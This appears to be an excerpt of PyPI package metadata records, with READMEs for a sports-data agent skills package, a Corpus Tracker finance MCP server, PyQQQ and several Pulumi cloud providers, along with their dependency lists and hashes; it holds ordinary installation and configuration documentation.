| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (points, rebounds, assists) |
| `get_news` | WNBA news articles |
| `get_schedule` | Schedule for a date |
### nhl-data
NHL data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent NHL scores |
| `get_standings` | Standings by conference and division |
| `get_teams` | All 32 NHL teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (goals, assists, points) |
| `get_news` | NHL news articles |
### mlb-data
MLB data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent MLB scores |
| `get_standings` | Standings by league and division |
| `get_teams` | All 30 MLB teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (batting avg, home runs, ERA) |
| `get_news` | MLB news articles |
| `get_schedule` | Schedule for a date |
### tennis-data
ATP and WTA tennis data via ESPN public endpoints. Tournament scores, rankings, calendars, player profiles, and news.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Active tournaments with current matches |
| `get_calendar` | Full season tournament schedule |
| `get_rankings` | Current ATP or WTA rankings |
| `get_player_info` | Individual player profile |
| `get_news` | Tennis news articles |
### cfb-data
College Football (CFB) data via ESPN public endpoints. 750+ FBS teams with AP/Coaches/CFP rankings.
| `get_scoreboard` | Live/recent college football scores |
| `get_standings` | Standings by conference |
| `get_teams` | All 750+ FBS teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_rankings` | AP Top 25, Coaches Poll, CFP rankings |
| `get_news` | College football news articles |
| `get_schedule` | Schedule by week and conference |
### cbb-data
College Basketball (CBB) data via ESPN public endpoints. 360+ D1 teams with AP/Coaches rankings and March Madness.
| `get_scoreboard` | Live/recent college basketball scores |
| `get_standings` | Standings by conference |
| `get_teams` | All 360+ D1 teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and player stats |
| `get_rankings` | AP Top 25, Coaches Poll |
| `get_news` | College basketball news articles |
| `get_schedule` | Schedule by date and conference |
### golf-data
PGA Tour, LPGA, and DP World Tour golf data via ESPN public endpoints. Tournament leaderboards, season schedules, golfer profiles, and news.
| `get_leaderboard` | Current tournament leaderboard with all golfer scores |
| `get_schedule` | Full season tournament schedule |
| `get_player_info` | Individual golfer profile |
| `get_news` | Golf news articles |
### fastf1
Formula 1 data via the [FastF1](https://github.com/theOehrly/Fast-F1) open-source library.
| Command | Description |
|---------|-------------|
| `get_session_data` | Session metadata (practice, qualifying, race) |
| `get_driver_info` | Driver details or full grid |
| `get_team_info` | Team details or all teams |
| `get_race_schedule` | Full calendar for a year |
| `get_lap_data` | Lap times, sectors, tire data |
| `get_race_results` | Final classification and fastest laps |
### kalshi
Kalshi's [official public API](https://trading-api.readme.io/reference/getmarkets). No API key needed for read-only market data.
| Command | Description |
|---------|-------------|
| `get_series_list` | All series filtered by sport tag |
| `get_series` | Single series details |
| `get_markets` | Markets with bid/ask/volume/open interest |
| `get_market` | Single market details |
| `get_events` | Events with pagination |
| `get_event` | Single event details |
| `get_trades` | Trade history |
| `get_market_candlesticks` | OHLCV price data (1min/1hr/1day) |
| `get_sports_filters` | Sports-specific filters and competitions |
| `get_exchange_status` | Exchange active/trading status |
| `get_exchange_schedule` | Exchange operating schedule |
### polymarket
Polymarket's official public APIs ([Gamma](https://gamma-api.polymarket.com) + [CLOB](https://docs.polymarket.com)). No API key needed for read-only data.
| Command | Description |
|---------|-------------|
| `get_sports_markets` | Active sports markets with type filtering |
| `get_sports_events` | Sports events by series/league |
| `get_series` | All series (NBA, NFL, MLB leagues) |
| `get_market_details` | Single market by ID or slug |
| `get_event_details` | Single event with nested markets |
| `get_market_prices` | Real-time midpoint, bid, ask from CLOB |
| `get_order_book` | Full order book with spread calculation |
| `get_sports_market_types` | 58+ market types (moneyline, spreads, totals, props) |
| `search_markets` | Full-text search across markets |
| `get_price_history` | Historical price data (1d, 1w, 1m, max) |
| `get_last_trade_price` | Most recent trade price |
### sports-news
RSS feed aggregation for sports news.
| Command | Description |
|---------|-------------|
| `fetch_feed` | Full feed with metadata and entries |
| `fetch_items` | Filtered items (date range, language, country) |
Supports any RSS/Atom feed URL and Google News queries.
---
## Architecture
```
sports-skills.sh
├── skills/ # SKILL.md files (agent instructions)
│ ├── football-data/SKILL.md # 21 commands, 13 leagues
│ ├── nfl-data/SKILL.md # NFL scores, standings, rosters
│ ├── nba-data/SKILL.md # NBA scores, standings, rosters
│ ├── wnba-data/SKILL.md # WNBA scores, standings, rosters
│ ├── nhl-data/SKILL.md # NHL scores, standings, rosters
│ ├── mlb-data/SKILL.md # MLB scores, standings, rosters
│ ├── tennis-data/SKILL.md # ATP + WTA tennis
│ ├── cfb-data/SKILL.md # College football scores, rankings
│ ├── cbb-data/SKILL.md # College basketball scores, rankings
│ ├── golf-data/SKILL.md # Golf leaderboards, schedules, profiles
│ ├── fastf1/SKILL.md # F1 sessions, laps, results
│ ├── kalshi/SKILL.md # Prediction markets (CFTC)
│ ├── polymarket/SKILL.md # Prediction markets (crypto)
│ └── sports-news/SKILL.md # RSS + Google News
├── src/sports_skills/ # Python runtime (used by skills)
├── site/ # Landing page (sports-skills.sh)
├── LICENSE
└── README.md
```
Each skill follows the [Agent Skills specification](https://agentskills.io/specification):
```yaml
---
name: football-data
description: |
Football (soccer) data across 13 leagues — standings, schedules, match stats, xG, transfers, player profiles.
Use when: user asks about football/soccer standings, fixtures, match stats, xG, lineups, transfers, or injury news.
license: MIT
metadata:
author: machina-sports
version: "0.1.0"
---
# Football Data
Instructions for the AI agent...
```
---
## Compatibility
Works with every agent that supports the SKILL.md format:
- Claude Code
- OpenClaw (clawdbot / moltbot)
- Cursor
- GitHub Copilot
- VS Code Copilot
- Gemini CLI
- Windsurf
- OpenCode
- Kiro
- Roo
- Trae
---
## Coming Soon
Licensed data skills — coming soon via [Machina Sports](https://machina.gg):
| Provider | Coverage | Status |
|----------|----------|--------|
| Sportradar | 1,200+ competitions, real-time feeds | Coming Soon |
| Stats Perform (Opta) | Advanced analytics, event-level data | Coming Soon |
| API-Football | 900+ leagues, live scores, odds | Coming Soon |
| Data Sports Group | US sports, player props, projections | Coming Soon |
These will ship as additional skills that drop in alongside the open-source ones. Same interface, same JSON envelope — just licensed data underneath. Built for commercial and production use with proper data licensing, SLAs, and enterprise support.
For early access or enterprise needs, see [machina.gg](https://machina.gg).
---
## Contributing
We're actively expanding to cover more sports and data sources — and always looking for contributions. Whether it's a new sport, a new league, a better data source, or improvements to existing skills, PRs are welcome.
1. Fork the repo
2. Create a skill in `skills/<your-skill>/SKILL.md`
3. Follow the SKILL.md spec (YAML frontmatter + Markdown instructions)
4. Open a PR
See the existing SKILL.md files and the [Agent Skills spec](https://agentskills.io/specification) for format details.
Join the [Machina Sports Discord](https://discord.gg/PBYd6FbBSK) to discuss ideas, get help, or coordinate on new skills.
---
## World Cup 2026
This project ships with World Cup 2026 coverage built in. The `football-data` skill includes FIFA World Cup as a supported competition. As the tournament approaches (June 2026), we'll add dedicated World Cup skills for bracket tracking, group stage analysis, and match predictions.
---
## Data Sources & Disclaimer
This project does not own, license, or redistribute any sports data. Each skill is a thin wrapper that accesses publicly available third-party sources on behalf of the user.
| Source | Access Method | Official API |
|--------|--------------|--------------|
| ESPN | Public web endpoints | No — undocumented, may change without notice |
| Understat | Public web data | No — community access, subject to their ToS |
| FPL | Public API | Semi-official — widely used by the community |
| Transfermarkt | Public web data | No — subject to their ToS |
| openfootball | Open-source dataset | Yes — [football.json](https://github.com/openfootball/football.json) (CC0/Public Domain) |
| FastF1 | Open-source library | Yes — [FastF1](https://github.com/theOehrly/Fast-F1) (MIT) |
| Kalshi | Official public API | Yes — [Trade API v2](https://trading-api.readme.io) |
| Polymarket | Official public APIs | Yes — [Gamma](https://gamma-api.polymarket.com) + [CLOB](https://docs.polymarket.com) |
| RSS / Google News | Standard RSS protocol | Yes — RSS is designed for syndication |
**Important:**
- This project is intended for **personal, educational, and research use**.
- You are responsible for complying with each data source's terms of service.
- Data from unofficial sources (ESPN, Understat, Transfermarkt) may break without notice if those sites change their structure.
- For commercial or production use with properly licensed data, see [machina.gg](https://machina.gg).
- This project is not affiliated with or endorsed by any of the data sources listed above.
---
## Acknowledgments
This project is built on top of great open-source work and public APIs:
- **[ESPN](https://www.espn.com)** — for keeping their web endpoints accessible. The backbone of football scores, standings, schedules, lineups, match stats, and timelines across all 13 leagues. Also powers the NFL, NBA, WNBA, NHL, MLB, and Tennis skills.
- **[ESPN](https://www.espn.com)** — for keeping their web endpoints accessible. The backbone of football scores, standings, schedules, lineups, match stats, and timelines across all 13 leagues. Also powers the NFL, NBA, WNBA, NHL, MLB, CFB, and CBB skills.
- **[ESPN](https://www.espn.com)** — for keeping their web endpoints accessible. The backbone of football scores, standings, schedules, lineups, match stats, and timelines across all 13 leagues. Also powers the NFL, NBA, WNBA, NHL, MLB, and Golf skills.
- **[Fantasy Premier League](https://fantasy.premierleague.com)** — for their community API powering injury news, player stats, ownership data, and ICT index for Premier League players.
- **[Transfermarkt](https://www.transfermarkt.com)** — for player market values, transfer history, and the richest player data in football.
- **[Understat](https://understat.com)** — for xG data across the top 5 European leagues.
- **[openfootball](https://github.com/openfootball/football.json)** — open public domain football data (CC0). Used as a fallback for schedules, standings, and team lists when ESPN is unavailable. Covers 10 leagues.
- **[FastF1](https://github.com/theOehrly/Fast-F1)** — the backbone of our Formula 1 skill. Thanks to theOehrly and contributors.
- **[feedparser](https://github.com/kurtmckee/feedparser)** — reliable RSS/Atom parsing for the news skill.
- **[Kalshi](https://kalshi.com)** and **[Polymarket](https://polymarket.com)** — for their public market data APIs.
- **[skills.sh](https://skills.sh)** — the open agent skills directory and CLI.
- **[Agent Skills](https://agentskills.io)** — the open spec that makes skills interoperable across agents.
---
## License
MIT — applies to the skill code and wrappers in this repository. Does not grant any rights to the underlying third-party data.
---
Built by [Machina Sports](https://machina.gg). The Operating System for sports AI.
| text/markdown | null | Machina Sports <hello@machina.gg> | null | null | null | atp, cbb, cfb, college-basketball, college-football, f1, football, golf, kalshi, lpga, mlb, nba, ncaa, news, nfl, nhl, pga, polymarket, prediction-markets, sports, tennis, wnba, wta | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"feedparser>=6.0",
"fastf1>=3.0; extra == \"all\"",
"feedparser>=6.0; extra == \"all\"",
"nfl-data-py>=0.3; extra == \"all\"",
"pandas>=2.0; extra == \"all\"",
"fastf1>=3.0; extra == \"dev\"",
"pandas>=2.0; extra == \"dev\"",
"pytest>=8.0; extra == \"dev\"",
"ruff>=0.9; extra == \"dev\"",
"fastf1>=3.0; extra == \"f1\"",
"pandas>=2.0; extra == \"f1\"",
"nfl-data-py>=0.3; extra == \"nfl\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:32:31.094655 | sports_skills-0.6.0.tar.gz | 142,520 | 6f/7a/832403cbbb9a78546bd0053a0b5df328b7cb9b0e9092349dbd49400a8800/sports_skills-0.6.0.tar.gz | source | sdist | null | false | 568c75da13bfc6163c7b0289931867e1 | 803458c5cab44cd4088e0841c9dd09c6a1826bc1de05b6c19cafa68c232e8268 | 6f7a832403cbbb9a78546bd0053a0b5df328b7cb9b0e9092349dbd49400a8800 | MIT | [
"LICENSE"
] | 220 |
2.4 | corpus-mcp | 0.1.3 | MCP Server for Corpus Tracker - Financial Portfolio Assistant | # Corpus MCP Server
A Model Context Protocol (MCP) server for the Corpus Tracker application. This server allows AI assistants (like Claude) to securely interact with your financial portfolio, enabling them to fetch holdings, analyze net worth, and manage transactions.
## Features
- **Portfolio Analytics**: Fetch net worth, asset allocation, and top holdings.
- **Asset Management**: List, add, and remove Gold and Stock holdings.
- **Finance Tracking**: Log income and expenses, view transaction history, and analyze cash flow.
- **Secure Authentication**: Uses API Key authentication to communicate with your Corpus Tracker backend.
## Available Tools
### Profile & Management
- `get_my_profile`: Get the current user's profile and settings.
- `list_corpora`: List all corpora (profiles) the user belongs to.
### Analytics
- `get_portfolio_summary`: Get aggregated net worth, asset breakdown, and liabilities.
- `get_top_holdings(limit)`: Get top holdings by value.
- `get_portfolio_history`: Get portfolio history.
### Gold Holdings
- `list_gold_holdings`: List all gold holdings.
- `add_gold_holding(weight_grams, purchase_price, purchase_date)`: Add a new gold holding.
- `delete_gold_holding(holding_id)`: Delete a gold holding by ID.
- `live_gold_price()`: Get live gold price.
- `history_of_gold_price(limit)`: Get history of gold price.
### Stock Holdings
- `list_stock_holdings`: List all stock holdings.
- `add_stock_holding(symbol, quantity, avg_price)`: Add a new stock holding.
- `update_stock_holding(holding_id, symbol, quantity, avg_price)`: Update an existing stock holding.
- `delete_stock_holding(holding_id)`: Delete a stock holding by ID.
- `live_stock_price(symbol)`: Get live stock price.
- `history_of_stock_price(symbol, limit)`: Get history of stock price.
### Financial Transactions
- `list_transactions(start_date, end_date, category, type, limit)`: List transactions with filters.
- `add_transaction(type, amount, category, description, date)`: Add a new income or expense transaction.
- `delete_transaction(txn_id)`: Delete a transaction by ID.
- `get_cashflow_trend(days)`: Get income vs expense trend for the last N days.
### Stock Transactions
- `search_stock_symbol(query)`: Search for stock symbols.
- `add_stock_transaction(symbol, holding_id, transaction_type, quantity, price_per_share, transaction_date, notes)`: Add a new stock transaction.
### Mutual Fund Holdings
- `list_mutual_fund_holdings`: List all mutual fund holdings.
### Emergency Fund Management
- `list_emergency_fund_holdings`: List all emergency fund holdings.
- `add_emergency_fund_contribution(amount, date, source, notes)`: Add a new emergency fund contribution.
## Installation
```bash
pip install corpus-mcp
```
## Configuration
The server requires two environment variables to connect to your backend:
- `API_URL`: The URL of your Corpus Tracker backend API (e.g., `https://my-corpus.vercel.app/api/v1`).
- `API_KEY`: Your personal API Key generated from the Corpus Tracker settings.
## Usage
### Running Standalone
You can run the server directly:
```bash
# Set environment variables
export API_URL="https://my-corpus.vercel.app/api/v1"
export API_KEY="sk_..."
# Run the server
corpus-mcp
```
### Using with Claude Desktop
Add the following configuration to your `claude_desktop_config.json`:
```json
{
"mcpServers": {
"corpus-tracker": {
"command": "uvx",
"args": [
"corpus-mcp"
],
"env": {
"API_URL": "https://my-corpus.vercel.app/api/v1",
"API_KEY": "your_api_key_here"
}
}
}
}
```
## Development
To install dependencies and run locally:
```bash
# Install dependencies
pip install .
# Run dev server
corpus-mcp
```
## License
MIT
| text/markdown | null | Mathan Karthik <mathanbe18@gmail.com> | null | null | MIT | corpus-tracker, finance, mcp, mcp-server | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Office/Business :: Financial"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"httpx>=0.27.0",
"mcp>=1.0.0",
"python-dotenv>=1.0.0"
] | [] | [] | [] | [
"Homepage, https://github.com/Mathankarthik18/corpus-mcp",
"Repository, https://github.com/Mathankarthik18/corpus-mcp",
"Documentation, https://github.com/Mathankarthik18/corpus-mcp#readme"
] | twine/6.2.0 CPython/3.13.0 | 2026-02-20T06:31:43.206781 | corpus_mcp-0.1.3.tar.gz | 48,430 | 06/5f/b37918477b56204f81146a5800585409f9f78913ab79223d9afbfbe0c27e/corpus_mcp-0.1.3.tar.gz | source | sdist | null | false | 39a8c67af372b4fc460ef206a057c922 | 50a47ff68a8e050d7601d1ed306e8395481feea6758a96e57fd537467ff6ef89 | 065fb37918477b56204f81146a5800585409f9f78913ab79223d9afbfbe0c27e | null | [] | 229 |
2.4 | pulumi-meraki | 0.5.0a1771568420 | A Pulumi package for creating and managing Cisco Meraki resources | # Cisco Meraki Resource Provider
The Cisco Meraki Resource Provider lets you manage [meraki](https://www.pulumi.com/registry/packages/meraki/) resources.
## Installing
This package is available for several languages/platforms:
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/meraki
```
or `yarn`:
```bash
yarn add @pulumi/meraki
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_meraki
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-meraki/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Meraki
```
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/meraki/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, meraki, category/network | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.com",
"Repository, https://github.com/pulumi/pulumi-meraki"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:31:20.688873 | pulumi_meraki-0.5.0a1771568420.tar.gz | 817,336 | fb/e8/53ccefb56cf8a634626c9a728f35ef0d41f01ed32f5720076f93d15c50d3/pulumi_meraki-0.5.0a1771568420.tar.gz | source | sdist | null | false | aa8bc463548a19fb7b03ea900906c4ff | bef0a6ebc5dbb5251d61a169fd3bc5680c61e37cc7590f12fb765a081b6f9593 | fbe853ccefb56cf8a634626c9a728f35ef0d41f01ed32f5720076f93d15c50d3 | null | [] | 197 |
2.4 | greenstream-config | 4.6.0 | A library for reading / writing Greenstream config files | # Greenstream Config
This contains files for reading/writing configuration classes for Greenstream.
## Release
Run the `Release` action on github.
**IT IS PUBLISHED PUBLICLY TO PYPI**
| text/markdown | Greenroom Robotics | team@greenroomrobotics.com | David Revay | david.revay@greenroomrobotics.com | Copyright (C) 2023, Greenroom Robotics | null | [
"Development Status :: 3 - Alpha",
"Environment :: Plugins",
"Intended Audience :: Developers",
"Programming Language :: Python",
"Topic :: Software Development :: Build Tools"
] | [] | https://github.com/Greenroom-Robotics/greenstream | null | null | [] | [] | [] | [
"setuptools"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T06:30:26.625375 | greenstream_config-4.6.0.tar.gz | 5,392 | 4a/38/a2d4c514b00eceb02180b5898743418e1552c100ab2f04324c273498f94e/greenstream_config-4.6.0.tar.gz | source | sdist | null | false | d531c53a53ae768042eb8e22743301c1 | 9580b27bfeae52da7f8f19ceead01b8639873e2e91156961521c1b3b32c4b3ff | 4a38a2d4c514b00eceb02180b5898743418e1552c100ab2f04324c273498f94e | null | [] | 277 |
2.4 | pulumi-nomad | 2.6.0a1771568519 | A Pulumi package for creating and managing nomad cloud resources. | [](https://github.com/pulumi/pulumi-nomad/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/nomad)
[](https://pypi.org/project/pulumi-nomad)
[](https://badge.fury.io/nu/pulumi.nomad)
[](https://pkg.go.dev/github.com/pulumi/pulumi-nomad/sdk/v2/go)
[](https://github.com/pulumi/pulumi-nomad/blob/master/LICENSE)
# HashiCorp Nomad Resource Provider
The HashiCorp Nomad Resource Provider lets you manage Nomad resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/nomad
or `yarn`:
$ yarn add @pulumi/nomad
### Python
To use from Python, install using `pip`:
$ pip install pulumi_nomad
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-nomad/sdk/v2
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Nomad
## Configuration
The following configuration points are available:
- `nomad:address` - The HTTP(S) API address of the Nomad agent. This must include the leading protocol (e.g. https://).
This can also be specified as the `NOMAD_ADDR` environment variable.
- `nomad:region` - The Nomad region to target. This can also be specified as the `NOMAD_REGION` environment variable.
- `nomad:httpAuth` - HTTP Basic Authentication credentials to be used when communicating with Nomad, in the format of
either `user` or `user:pass`. This can also be specified using the `NOMAD_HTTP_AUTH` environment variable.
- `nomad:caFile` - A local file path to a PEM-encoded certificate authority used to verify the remote agent's
certificate. This can also be specified as the `NOMAD_CACERT` environment variable.
- `nomad:caPerm` - PEM-encoded certificate authority used to verify the remote agent's certificate.
- `nomad:certFile` - A local file path to a PEM-encoded certificate provided to the remote agent. If this is specified,
key_file or key_pem is also required. This can also be specified as the `NOMAD_CLIENT_CERT` environment variable.
- `nomad:certPem` - PEM-encoded certificate provided to the remote agent. If this is specified, `keyFile` or `keyPem` is also required.
- `nomad:keyFile` - A local file path to a PEM-encoded private key. This is required if `certFile` or `certPem` is
specified. This can also be specified via the `NOMAD_CLIENT_KEY` environment variable.
- `nomad:keyPem` - PEM-encoded private key. This is required if `certFile` or `certPem` is specified.
- `nomad:headers` - A configuration block, described below, that provides headers to be sent along with all
requests to Nomad. This block can be specified multiple times.
- `nomad:vaultToken` - A Vault token used when submitting the job. This can also be specified as the `VAULT_TOKEN`
environment variable or using a Vault token helper (see Vault's documentation for more details).
- `nomad:consulToken` - A Consul token used when submitting the job. This can also be specified as the
`CONSUL_HTTP_TOKEN` environment variable. See below for strategies when multiple Consul tokens are required.
- `nomad:secretId` - The Secret ID of an ACL token to make requests with, for ACL-enabled clusters. This can also be
specified via the `NOMAD_TOKEN` environment variable.
The `nomad:headers` configuration block accepts the following arguments:
- `name` - The name of the header.
- `value` - The value of the header.
## Reference
For further information, please visit [the Nomad provider docs](https://www.pulumi.com/docs/intro/cloud-providers/nomad)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/nomad).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, nomad | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-nomad"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:30:24.251250 | pulumi_nomad-2.6.0a1771568519.tar.gz | 99,547 | 33/bf/1d394dce01850c8083d48bc58d40ec847505740a5ad98fb6d5473c19bea1/pulumi_nomad-2.6.0a1771568519.tar.gz | source | sdist | null | false | 1ce71bbe05bcaa528b6c0eee2da067db | 980cce4c3dfaff38d71cd7530ebd3f8647382b325be48b33895f4582224397a7 | 33bf1d394dce01850c8083d48bc58d40ec847505740a5ad98fb6d5473c19bea1 | null | [] | 194 |
2.1 | pyqqq | 0.12.227 | Package for quantitative strategy development on the PyQQQ platform | # PyQQQ SDK
## How to Use the Package
You can install it by running the following command:
```
pip install pyqqq
```
## Setting Up the Development Environment
0. Create a Virtual Environment (Optional)
You can create and use a virtual environment with the following steps:
```
pyqqq-user:$ cd sdk
pyqqq-user:sdk:$ python -m venv .venv --prompt sdk
pyqqq-user:sdk:$ activate .venv/bin/activate
(sdk) pyqqq-user:sdk:$
```
1. Install Poetry
```
(sdk) pyqqq-user:sdk:$ pip install poetry
```
2. Install Dependencies
```
(sdk) pyqqq-user:sdk:$ poetry install
```
| text/markdown | PyQQQ team | pyqqq.cs@gmail.com | null | null | MIT | null | [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12"
] | [] | null | null | <4.0,>=3.9 | [] | [] | [] | [
"tinydb<5.0.0,>=4.8.0",
"requests<3.0.0,>=2.31.0",
"python-dotenv<2.0.0,>=1.0.1",
"websockets<13.0,>=12.0",
"pandas<3.0.0,>=2.0.3",
"cssutils<3.0.0,>=2.10.2",
"cachetools<6.0.0,>=5.3.3",
"pika<2.0.0,>=1.3.2",
"pycryptodome<4.0.0,>=3.20.0",
"diskcache<6.0.0,>=5.6.3",
"pandas-market-calendars<5.0.0,>=4.4.2"
] | [] | [] | [] | [
"Documentation, https://docs.pyqqq.net"
] | poetry/1.8.3 CPython/3.11.7 Linux/6.6.113+ | 2026-02-20T06:30:07.191474 | pyqqq-0.12.227.tar.gz | 184,236 | fb/45/d27d4b0d2adc4f412dd391a09017b951b6506f4a96211acdd7f3b3feef98/pyqqq-0.12.227.tar.gz | source | sdist | null | false | 582f8ab781ac24c422537c253afbee69 | 42792a407bf08e83370e3f5bf0814f21011625f1158fc71ed872cd8c09862b8a | fb45d27d4b0d2adc4f412dd391a09017b951b6506f4a96211acdd7f3b3feef98 | null | [] | 229 |
2.4 | pulumi-mongodbatlas | 4.5.0a1771568387 | A Pulumi package for creating and managing mongodbatlas cloud resources. | [](https://github.com/pulumi/pulumi-mongodbatlas/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/mongodbatlas)
[](https://pypi.org/project/pulumi-mongodbatlas)
[](https://badge.fury.io/nu/pulumi.mongodbatlas)
[](https://pkg.go.dev/github.com/pulumi/pulumi-mongodbatlas/sdk/v2/go)
[](https://github.com/pulumi/pulumi-mongodbatlas/blob/master/LICENSE)
# MongoDB Atlas provider
The MongoDB Atlas resource provider for Pulumi lets you interact with MongoDB Atlas in your infrastructure
programs. To use this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/mongodbatlas
or `yarn`:
$ yarn add @pulumi/mongodbatlas
### Python
To use from Python, install using `pip`:
$ pip install pulumi-mongodbatlas
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-mongodbatlas/sdk/v2
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Mongodbatlas
## Configuration
The following configuration points are available:
- `mongodbatlas:publicKey` - (Optional) This is the MongoDB Atlas API public_key. It must be provided, but it can also be
sourced from the `MONGODB_ATLAS_PUBLIC_KEY` environment variable.
- `mongodbatlas:privateKey` - (Optional) This is the MongoDB Atlas private_key. It must be provided, but it can also be
sourced from the `MONGODB_ATLAS_PRIVATE_KEY` environment variable.
## Reference
For further information, please visit [the MongoDB Atlas provider docs](https://www.pulumi.com/docs/intro/cloud-providers/mongodbatlas) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/mongodbatlas).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, mongodbatlas | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-mongodbatlas"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:29:49.686261 | pulumi_mongodbatlas-4.5.0a1771568387.tar.gz | 596,513 | e6/74/06f9f9ea3c97346fadbc4dc283d9d8be62fae38d0bdb6e125e93b4822feb/pulumi_mongodbatlas-4.5.0a1771568387.tar.gz | source | sdist | null | false | c254f3a8d4d6afff58c9e9cc07e7c73e | 8ab44e035e2e46c878147a2716ca4090dd3a225951569bca5cf4ad85257b7b97 | e67406f9f9ea3c97346fadbc4dc283d9d8be62fae38d0bdb6e125e93b4822feb | null | [] | 193 |
2.4 | pulumi-newrelic | 5.62.0a1771568491 | A Pulumi package for creating and managing New Relic resources. | [](https://github.com/pulumi/pulumi-newrelic/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/newrelic)
[](https://pypi.org/project/pulumi-newrelic)
[](https://badge.fury.io/nu/pulumi.newrelic)
[](https://pkg.go.dev/github.com/pulumi/pulumi-newrelic/sdk/v5/go)
[](https://github.com/pulumi/pulumi-newrelic/blob/master/LICENSE)
# New Relic Provider
The New Relic resource provider for Pulumi lets you use New Relic resources in your cloud programs.
To use this package, please [install the Pulumi CLI first][1].
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/newrelic
or `yarn`:
$ yarn add @pulumi/newrelic
### Python
To use from Python, install using `pip`:
$ pip install pulumi_newrelic
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-newrelic/sdk/v5
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Newrelic
## Configuration
The following configuration points are available:
- `newrelic:apiKey` - Your New Relic API key. The `NEW_RELIC_API_KEY` environment variable can also be used.
- `newrelic:adminApiKey` - Your New Relic Admin API key. The `NEW_RELIC_ADMIN_API_KEY` environment variable can also be used.
- `newrelic:region` - The region for the data center for which your New Relic account is configured. The New Relic region
can also be set via the environment variable `NEW_RELIC_REGION`. Valid values are `US` or `EU`. Only one region per
provider block can be configured. If you have accounts in both regions, you must instantiate two providers -
one for US and one for EU
